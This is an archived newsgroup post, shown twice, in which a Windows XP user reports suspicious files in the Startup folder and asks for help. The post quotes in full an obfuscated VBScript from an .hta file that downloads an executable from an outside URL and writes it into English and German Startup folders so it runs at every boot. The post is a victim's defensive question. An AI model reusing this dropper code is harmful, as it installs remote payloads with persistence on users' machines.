Archived from groups: microsoft.public.windowsxp.security_admin (More info?)
I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0 bytes).
My scanners(TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following::
-------------------
set o = CreateObject("m"+"sxml2.XML"+"HTTP") :
o.open "GET","http://paddy.home.comcast.net/xp.exe",False :
o.send :
set s = createobject("ad"+"odb"+".stre"+"am") :
s.type=1 :
s.open :
s.write o.responseBody :
s.savetofile "C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\OfficeOSA.exe",2 :
s.savetofile "C:\Dokumente und Einstellungen\All
Users\Startmenu\Programme\Autostart\OfficeOSA.exe",2 :
window.self.close() :
--------------------------
I'm not fluent in vbscript, but doesn't this code get stuff from that
comcast url, and then put it in these files that it creates in the startup
folder?
Presumably it's supposed to run the 'stuff' it fetched from the comcast URL,
whatever it is, every time I reboot. Doesn't just the fact that this has
occurred at all indicate a breach? I don't know if I should be alarmed or
not, my scanners show me all the other places where malicious files can be
put where they will be automaticaly run (runonce, runservices, etc) and
there is nothing else there.
Can anyone fill me in on this, or relate similar occurrences?
I found a couple strange little files in my startup folder
( C:\Documents and Settings\All Users\Start Menu\Programs),
one file was called msoffice.hta, and the other was officeOSA.exe (0 bytes).
My scanners(TCMonitor, TCActive) aren't triggered by these files, but I'm
pretty suspicious, given that the .hta file contained the following::
-------------------
set o = CreateObject("m"+"sxml2.XML"+"HTTP") :
o.open "GET","http://paddy.home.comcast.net/xp.exe",False :
o.send :
set s = createobject("ad"+"odb"+".stre"+"am") :
s.type=1 :
s.open :
s.write o.responseBody :
s.savetofile "C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\OfficeOSA.exe",2 :
s.savetofile "C:\Dokumente und Einstellungen\All
Users\Startmenu\Programme\Autostart\OfficeOSA.exe",2 :
window.self.close() :
--------------------------
I'm not fluent in vbscript, but doesn't this code get stuff from that
comcast url, and then put it in these files that it creates in the startup
folder?
Presumably it's supposed to run the 'stuff' it fetched from the comcast URL,
whatever it is, every time I reboot. Doesn't just the fact that this has
occurred at all indicate a breach? I don't know if I should be alarmed or
not, my scanners show me all the other places where malicious files can be
put where they will be automaticaly run (runonce, runservices, etc) and
there is nothing else there.
Can anyone fill me in on this, or relate similar occurrences?
Facebook
Twitter
Instagram